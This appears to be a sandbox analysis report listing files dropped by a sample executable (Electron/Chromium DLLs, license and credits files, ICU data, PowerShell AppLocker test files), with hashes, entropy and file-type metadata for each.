                                                                                                                                                                      SHA1:A03132ADCB99A82BA269D56AB6577CCFD1BB08E5
                                                                                                                                                                      SHA-256:C1802B29B13663A8890031411270866834246931F71F41397682DD88FA16D485
                                                                                                                                                                      SHA-512:ABD93CDD634AD4D38B7E3714B183335CDDB9E3AD14660247CC7285066C95342AC8595D68CD0868B8512E73BB656AB54386045533F998576B2CD6501BF456CD2C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):588152
                                                                                                                                                                      Entropy (8bit):4.83735352889622
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:bFzofuYUahtcOm3A0Tg8zY8y4XrxXSIIBYgHi:JMfu/fTY8zrM9C7
                                                                                                                                                                      MD5:4CD37EA771EA4FE2F3AD46217CC02206
                                                                                                                                                                      SHA1:31680E26869B007E62550E96DBF846B3980D5B2B
                                                                                                                                                                      SHA-256:95F7B8664306DA8D0073A795E86590ED6FDAEDE5F489132E56C8779F53CF1ED5
                                                                                                                                                                      SHA-512:E1369734CBE17AAF6DD3CEEFB57F056C5A9346D2887A7D3EE7ED177386D7F5E624407869D53902B56AB350E4DED5612C3B0F52C2DD3EFA307E9947701068A2A0
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):5334528
                                                                                                                                                                      Entropy (8bit):6.335261874351837
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:98304:RKJSTu+985EkjstvgsnpkkHF3y/AFIB7:RQq85EkjstvgsnpkkJETB
                                                                                                                                                                      MD5:524B0D85D992F86A7F26C162F3DBB91C
                                                                                                                                                                      SHA1:BC9C862FD01F6134A0514DCB63F9FAB7A61CE269
                                                                                                                                                                      SHA-256:5B2FFB78FA963F2DEA5A7FCF7676FC3ABA243C4372D7528C8F1FC8F726D0A3FA
                                                                                                                                                                      SHA-512:422A18AF294D7551224E05F5F4F5DCFA51B3455C2E61FC285FD2B95B50274EB77FF317647E17B0E7D47459B4FED19C7C88C90E0878F2269A78D598B1196401D8
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):106
                                                                                                                                                                      Entropy (8bit):4.724752649036734
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:YD96WyV18tzsmyXLVi1rTVWSCwW2TJHzeZ18rY:Y8WyV18tAZLVmCwXFiZ18rY
                                                                                                                                                                      MD5:8642DD3A87E2DE6E991FAE08458E302B
                                                                                                                                                                      SHA1:9C06735C31CEC00600FD763A92F8112D085BD12A
                                                                                                                                                                      SHA-256:32D83FF113FEF532A9F97E0D2831F8656628AB1C99E9060F0332B1532839AFD9
                                                                                                                                                                      SHA-512:F5D37D1B45B006161E4CEFEEBBA1E33AF879A3A51D16EE3FF8C3968C0C36BBAFAE379BF9124C13310B77774C9CBB4FA53114E83F5B48B5314132736E5BB4496F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:{"file_format_version": "1.0.0", "ICD": {"library_path": ".\\vk_swiftshader.dll", "api_version": "1.0.5"}}
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):928256
                                                                                                                                                                      Entropy (8bit):6.558092096809165
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24576:IEW7F7IyaHx/fempu2e6Z5WODYsHh6g3P0zAk7o:e7IyaBfempa6Z5WODYsHh6g3P0zAk7
                                                                                                                                                                      MD5:6D4ADF9A48DBCE2E480EF10B1338CA3C
                                                                                                                                                                      SHA1:CEB77D5768C6EDA84EC8E0B43821B8027764DE81
                                                                                                                                                                      SHA-256:4CCA7E6C05B2D988926E4B4D0C8FF91D6356F18DE8BF40B440251180E5CAD6A7
                                                                                                                                                                      SHA-512:106DB7309B40AFABB1CCA911B204C83129683DC116AEC198568C4228C581BF0DE5963BFFC0B50DF8F43EC355264F271FC383F4155BE45350C0D7DD429C7F7F09
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):160084992
                                                                                                                                                                      Entropy (8bit):6.744040501876811
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1572864:/LBZB52nvuZ7wVuMbgR7Sp6kYdEctmhoLsPagBsgkx52HYhwj+vfIBUdoJnP9Dj0:/ypCmJctBjj2+Jv
                                                                                                                                                                      MD5:4DE03596272B7D7B70FF34893D072F21
                                                                                                                                                                      SHA1:BC07189E5B35BC6AE9319E07ED107EDCA583231E
                                                                                                                                                                      SHA-256:1D8AB53874B2EDFB058DD64DA8A61D92C8A8E302CC737155E0D718DBE169BA36
                                                                                                                                                                      SHA-512:9C63702A0F07E2104C161036CE269CF7C4516DFC97C1D9DF979FE42757D6020CACDC2186AF8BDA9E6EAAB7D010D882372F52553CB5EBC7F890A84137D1654A40
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...)<#d.........."......0...T.......F.........@..........................................`...........................................+.. ..0"..h............Pt.._@..........P.......!.......................!.(... Q..@...........@8......`.*......................text...:/.......0.................. ..`.rdata..h.n..@....n..4..............@..@.data....TB...1.......1.............@....pdata..._@..Pt..`@...9.............@..@.00cfg..0.............z.............@..@.gxfg...pA.......B....z.............@..@.retplne.............Dz..................rodata...... .......Fz............. ..`.tls.........@.......Xz.............@...CPADinfo8....P.......\z.............@...LZMADEC......`.......^z............. ..`_RDATA..\............pz.............@..@malloc_h+............rz............. ..`.rsrc................xz.............@..@.reloc......P........|.............@..B................
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1096
                                                                                                                                                                      Entropy (8bit):5.13006727705212
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:36DiJHxRHuyPP3GtIHw1Gg9QH+sUW8Ok4F+d1o36qjFD:36DiJzfPvGt7ICQH+sfIte36AFD
                                                                                                                                                                      MD5:4D42118D35941E0F664DDDBD83F633C5
                                                                                                                                                                      SHA1:2B21EC5F20FE961D15F2B58EFB1368E66D202E5C
                                                                                                                                                                      SHA-256:5154E165BD6C2CC0CFBCD8916498C7ABAB0497923BAFCD5CB07673FE8480087D
                                                                                                                                                                      SHA-512:3FFBBA2E4CD689F362378F6B0F6060571F57E228D3755BDD308283BE6CBBEF8C2E84BEB5FCF73E0C3C81CD944D01EE3FCF141733C4D8B3B0162E543E0B9F3E63
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:Copyright (c) Electron contributors.Copyright (c) 2013-2020 GitHub Inc...Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the."Software"), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND.NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE.LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION.OF CONTRACT, TORT OR OTHERWISE, ARISIN
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:HTML document, ASCII text
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):8312662
                                                                                                                                                                      Entropy (8bit):4.705814170451806
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24576:dbTy6TU675kfWScRQfJw91SmfJB6i6e6R626X8HHdE/pG6:tygpj
                                                                                                                                                                      MD5:312446EDF757F7E92AAD311F625CEF2A
                                                                                                                                                                      SHA1:91102D30D5ABCFA7B6EC732E3682FB9C77279BA3
                                                                                                                                                                      SHA-256:C2656201AC86438D062673771E33E44D6D5E97670C3160E0DE1CB0BD5FBBAE9B
                                                                                                                                                                      SHA-512:DCE01F2448A49A0E6F08BBDE6570F76A87DCC81179BB51D5E2642AD033EE81AE3996800363826A65485AB79085572BBACE51409AE7102ED1A12DF65018676333
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: Generated by licenses.py; do not edit. --><!doctype html>.<html>.<head>.<meta charset="utf-8">.<meta name="viewport" content="width=device-width">.<meta name="color-scheme" content="light dark">.<title>Credits</title>.<link rel="stylesheet" href="chrome://resources/css/text_defaults.css">.<link rel="stylesheet" href="chrome://credits/credits.css">.</head>.<body>.<span class="page-title" style="float:left;">Credits</span>.<a id="print-link" href="#" style="float:right;" hidden>Print</a>.<div style="clear:both; overflow:auto;"> Chromium <3s the following projects -->.<div class="product">.<span class="title">2-dim General Purpose FFT (Fast Fourier/Cosine/Sine Transform) Package</span>.<span class="homepage"><a href="http://www.kurims.kyoto-u.ac.jp/~ooura/fft.html">homepage</a></span>.<input type="checkbox" hidden id="0">.<label class="show" for="0" tabindex="0"></label>.<div class="licence">.<pre>Copyright(C) 1997,2001 Takuya OOURA (email: ooura@kurims.kyoto-u.ac.jp)..You may us
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):127125
                                                                                                                                                                      Entropy (8bit):7.915612661029362
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:vlKzwqCT4wDNzIwL2o418Gb0+VRLf0ld0GY3cQ39Vm2I:vlKzwt4uEgK18Gb0OV8ld0GecQ3f2
                                                                                                                                                                      MD5:ACD0FA0A90B43CD1C87A55A991B4FAC3
                                                                                                                                                                      SHA1:17B84E8D24DA12501105B87452F86BFA5F9B1B3C
                                                                                                                                                                      SHA-256:CCBCA246B9A93FA8D4F01A01345E7537511C590E4A8EFD5777B1596D10923B4B
                                                                                                                                                                      SHA-512:3E4C4F31C6C7950D5B886F6A8768077331A8F880D70B905CF7F35F74BE204C63200FF4A88FA236ABCCC72EC0FC102C14F50DD277A30F814F35ADFE5A7AE3B774
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):177406
                                                                                                                                                                      Entropy (8bit):7.939611912805236
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:4DQYaEQN6AJPKNzIwafR54x5GMR+F44ffbdZnYw9p4AbIVGYoDd+HxNK/rIM0:4DQYaNN68QEVgx5GMRejnbdZnVE6YopY
                                                                                                                                                                      MD5:4610337E3332B7E65B73A6EA738B47DF
                                                                                                                                                                      SHA1:8D824C9CF0A84AB902E8069A4DE9BF6C1A9AAF3B
                                                                                                                                                                      SHA-256:C91ABF556E55C29D1EA9F560BB17CC3489CB67A5D0C7A22B58485F5F2FBCF25C
                                                                                                                                                                      SHA-512:039B50284D28DCD447E0A486A099FA99914D29B543093CCCDA77BBEFDD61F7B7F05BB84B2708AE128C5F2D0C0AB19046D08796D1B5A1CFF395A0689AB25CCB51
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):4916712
                                                                                                                                                                      Entropy (8bit):6.398049523846958
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:49152:KCZnRO4XyM53Rkq4ypQqdoRpmruVNYvkaRwvhiD0N+YEzI4og/RfzHLeHTRhFRNc:xG2QCwmHPnog/pzHAo/A6l
                                                                                                                                                                      MD5:2191E768CC2E19009DAD20DC999135A3
                                                                                                                                                                      SHA1:F49A46BA0E954E657AAED1C9019A53D194272B6A
                                                                                                                                                                      SHA-256:7353F25DC5CF84D09894E3E0461CEF0E56799ADBC617FCE37620CA67240B547D
                                                                                                                                                                      SHA-512:5ADCB00162F284C16EC78016D301FC11559DD0A781FFBEFF822DB22EFBED168B11D7E5586EA82388E9503B0C7D3740CF2A08E243877F5319202491C8A641C970
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........|3..]...]...]..e\...]...\.5.]..e...]..wX...]..wY...]..e^...]..eX.y.]..eY...]..e]...]..eU./.]..e....]..e_...].Rich..].................PE..d...^.}`.........." ......8..........<).......................................K.....:FK...`A........................................`%G.x....(G.P.....J.@.....H.......J..%....J.....p.D.p....................S<.(...pR<.@............S<.(............................text.....8.......8................. ..`.rdata...F....8..P....8.............@..@.data...`....@G......@G.............@....pdata........H......@H.............@..@.rsrc...@.....J......@J.............@..@.reloc........J......PJ.............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2883072
                                                                                                                                                                      Entropy (8bit):6.697367886822868
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:49152:YGJO72cNsdMZWfAn1fdmZMOqcQrGhjUHgNxGUwSCmmfYDJGz5SN3lzl3hSKqH:Jj8n1QqGCmmfIUz59t
                                                                                                                                                                      MD5:E096C168B79A56DED0DF1AA142D9F1DA
                                                                                                                                                                      SHA1:318F20DAB294A315BD935160E9417FB5B28300F5
                                                                                                                                                                      SHA-256:65CC75329D17EC264E7A2DB571EA55F918394241445EA64569A56C75D0CFDC60
                                                                                                                                                                      SHA-512:3DCCF6CE85EF7E75690A5851642F10BB5E6E1572E91E933BACB7FCBFE405B0412B94BA0E160C3BA8D68D2B9AFC1DA268F61C83DCCD6453D8C9470931EE900BFD
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...)<#d.........." .....$#..................................................@B...........`A..........................................*.......*.(.............@...............B..3....).......................).(....R#.@............"*.P............................text....##......$#................. ..`.rdata..l....@#......(#.............@..@.data...x.....*.."....*.............@....pdata........@.......*.............@..@.00cfg..8.....A.......+.............@..@.gxfg....,....A.......+.............@..@.retplne......A.......+..................tls..........A.......+.............@..._RDATA..\.....A.......+.............@..@.reloc...3....B..4....+.............@..B........................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):10542048
                                                                                                                                                                      Entropy (8bit):6.277141340322909
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:98304:OKPBQYOo+ddlymOk25flQCUliXUxiG9Ha93Whla6ZGdnp/8k:OKPBhORjOhCliXUxiG9Ha93Whla6ZGrn
                                                                                                                                                                      MD5:D89CE8C00659D8E5D408C696EE087CE3
                                                                                                                                                                      SHA1:49FC8109960BE3BB32C06C3D1256CB66DDED19A8
                                                                                                                                                                      SHA-256:9DFBE0DAD5C7021CFE8DF7F52458C422CBC5BE9E16FF33EC90665BB1E3F182DE
                                                                                                                                                                      SHA-512:DB097CE3EB9E132D0444DF79B167A7DCB2DF31EFFBBD3DF72DA3D24AE2230CC5213C6DF5E575985A9918FBD0A6576E335B6EBC12B6258BC93FA205399DE64C37
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:...'........CmnD........ Copyright (C) 2016 and later: Unicode, Inc. and others. License & terms of use: http://www.unicode.org/copyright.html .Q....B.......B...#...B.. $...B..p$...B...$...B...%...B..`P...C...P...C...Q..(C......<C.....OC......bC..@...uC.......C..P....C.......C.......C..p....C.. ....C.......C.......D..p... D.....3D..0...FD.....YD.....lD.......D......D..0....D.......D..p....D......D..@....D.......E......E..@...*E.....=E..P...NE......bE.....rE..@....E.......E.......E..P....E.......E......E..@....F.......F.....'F..0...7F..P...JF......aF......qF...G...F.. H...F..`K...F...K...F...L...F...-...F...c...G....'.'G....'.>G..@.'.UG..0.'.oG....'..G...!'..G...!'..G..P&'..G...)'..G..@*'..H..`.(..H...e).7H..0.).VH...)*.xH....*..H....*..H...P+..H...Y+..H...Z+..I...]+. I..`^+.9I.. .+.UI....+.lI....+..I..P.-..I...=...I.......I.......I.. ....J..p....J......-J..p...EJ......ZJ......rJ..`....J..@....J.......J.......J..0....J.......J.......J..0....K..@....K..../.2K...,/.GK..../.\K..
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):481280
                                                                                                                                                                      Entropy (8bit):6.330677392522242
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:F9L2FFtoVsruIzUEzUST6uHKw+BubaOQ74PlqF8:F9CGafznzUSTRY70I
                                                                                                                                                                      MD5:1EECFB04C4434F5A813C8F0C0C8F2C88
                                                                                                                                                                      SHA1:6DC3CA4B3F72E7FB33BA26FA488DE323EDB59ADD
                                                                                                                                                                      SHA-256:897CEB95FB164640DDD2426673997B5F6FC2619FD916B038B575A70A0682A706
                                                                                                                                                                      SHA-512:D7818A42A76508AC3150AEA8D4E168B2DB36F55F71983A177002086380A82E307624CFE37B01FFC3D7EB407485D182654D0D7C6A0C06CCAAE60666630469C7E0
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...)<#d.........." .....$................................................................`A........................................00......F>..(.......x.... ...C..............0....(.......................'..(...@A..@...........pA...............................text....".......$.................. ..`.rdata.......@.......(..............@..@.data....L....... ..................@....pdata...C... ...D..................@..@.00cfg..8....p......................@..@.gxfg...`$.......&..................@..@.retplne.............>...................tls....!............@..............@..._RDATA..\............B..............@..@.rsrc...x............D..............@..@.reloc..0............J..............@..B................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):7625728
                                                                                                                                                                      Entropy (8bit):6.463180789552528
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:98304:U8qvGdDtslh+LD3ZDWfnSvBSDU5bPm3k89Ld3gsOMt/:JD3ZXJ7bPWLWsD/
                                                                                                                                                                      MD5:CBA2436016F7A2838588A52D5B6F30F1
                                                                                                                                                                      SHA1:81DDF44B3E122DFBEE1A2CD8D4544364F1A621A4
                                                                                                                                                                      SHA-256:BCB3A3D2FCA3C33FA3D1D5DC976AA913CDC8001DF8E64C2CD3D2C545245141BF
                                                                                                                                                                      SHA-512:D92A880B5F83C5AE10AE9A83E38A293BB0E8C7659DD6ECE162FC752D57C9FCDE8036B81B023CD9F0F4F32B95B06FD4C366E20301010354B6CB904398A3149A44
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...)<#d.........." ......Z...........M......................................`u...........`A..........................................k.8.....l.d....pt.......q.lO............t......vk.....................huk.(.....Z.@.............l.......k.@....................text...e.Z.......Z................. ..`.rdata..l.....Z.......Z.............@..@.data.........m..|....m.............@....pdata..lO....q..P....q.............@..@.00cfg..8.....t......Ps.............@..@.gxfg....+....t..,...Rs.............@..@.retplne.....@t......~s..................tls....:....Pt.......s.............@..._RDATA..\....`t.......s.............@..@.rsrc........pt.......s.............@..@.reloc........t.......s.............@..B................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):377708
                                                                                                                                                                      Entropy (8bit):5.4079285675542845
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:ebGJWQdLX/Wi6fR9a5DhZ2FQPnUGSBhjA636Zi2Jyn9Ybt5KXpgmLwSVxJsVxSjf:6GJW2bOi6fRmZ2OPnUThjA636Zi2Jynd
                                                                                                                                                                      MD5:7E51349EDC7E6AED122BFA00970FAB80
                                                                                                                                                                      SHA1:EB6DF68501ECCE2090E1AF5837B5F15AC3A775EB
                                                                                                                                                                      SHA-256:F528E698B164283872F76DF2233A47D7D41E1ABA980CE39F6B078E577FD14C97
                                                                                                                                                                      SHA-512:69DA19053EB95EEF7AB2A2D3F52CA765777BDF976E5862E8CEBBAA1D1CE84A7743F50695A3E82A296B2F610475ABB256844B6B9EB7A23A60B4A9FC4EAE40346D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):613642
                                                                                                                                                                      Entropy (8bit):4.894733266944232
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:b3pIuPzq8xSTwO8sgjZz5E9VJAVtnuviQix30jH8+I:b3plq8xLO8zjZz5E9VJAVtSiQO
                                                                                                                                                                      MD5:2009647C3E7AED2C4C6577EE4C546E19
                                                                                                                                                                      SHA1:E2BBACF95EC3695DAAE34835A8095F19A782CBCF
                                                                                                                                                                      SHA-256:6D61E5189438F3728F082AD6F694060D7EE8E571DF71240DFD5B77045A62954E
                                                                                                                                                                      SHA-512:996474D73191F2D550C516ED7526C9E2828E2853FCFBE87CA69D8B1242EB0DEDF04030BBCA3E93236BBD967D39DE7F9477C73753AF263816FAF7D4371F363BA3
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):671738
                                                                                                                                                                      Entropy (8bit):4.903433286644294
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:gjptqBycpX8vYULIrmhkH+P5NNb++YTzgpPMgSENeX:BB2um5S++
                                                                                                                                                                      MD5:47A6D10B4112509852D4794229C0A03B
                                                                                                                                                                      SHA1:2FB49A0B07FBDF8D4CE51A7B5A7F711F47A34951
                                                                                                                                                                      SHA-256:857FE3AB766B60A8D82B7B6043137E3A7D9F5CFB8DDD942316452838C67D0495
                                                                                                                                                                      SHA-512:5F5B280261195B8894EFAE9DF2BECE41C6C6A72199D65BA633C30D50A579F95FA04916A30DB77831F517B22449196D364D6F70D10D6C5B435814184B3BCF1667
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):701716
                                                                                                                                                                      Entropy (8bit):4.66095894344634
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:7Od6KqVw2iILlY+dAs1aQUfjoaVV4FH2mFxvx35uKN3CuKb7szmV2Jfu64K+z5jG:KsKqJi6lY+dAs1aQU7yZx35uK4XQzQI9
                                                                                                                                                                      MD5:A19269683A6347E07C55325B9ECC03A4
                                                                                                                                                                      SHA1:D42989DAF1C11FCFFF0978A4FB18F55EC71630EC
                                                                                                                                                                      SHA-256:AD65351A240205E881EF5C4CF30AD1BC6B6E04414343583597086B62D48D8A24
                                                                                                                                                                      SHA-512:1660E487DF3F3F4EC1CEA81C73DCA0AB86AAF121252FBD54C7AC091A43D60E1AFD08535B082EFD7387C12616672E78AA52DDDFCA01F833ABEF244284482F2C76
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):904943
                                                                                                                                                                      Entropy (8bit):4.273773274227575
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:wqf22AwWk+ADszaaH0PaMadiMNKVbVtQW01jilDouMGsW2uMBVr+9RU4yVS5PMxq:1zW/AMfafVoCp8YbkJBbdJ2DB5y0XlRB
                                                                                                                                                                      MD5:5CDD07FA357C846771058C2DB67EB13B
                                                                                                                                                                      SHA1:DEB87FC5C13DA03BE86F67526C44F144CC65F6F6
                                                                                                                                                                      SHA-256:01C830B0007B8CE6ACA46E26D812947C3DF818927B826F7D8C5FFD0008A32384
                                                                                                                                                                      SHA-512:2AC29A3AA3278BD9A8FE1BA28E87941F719B14FBF8B52E0B7DC9D66603C9C147B9496BF7BE4D9E3AA0231C024694EF102DCC094C80C42BE5D68D3894C488098C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
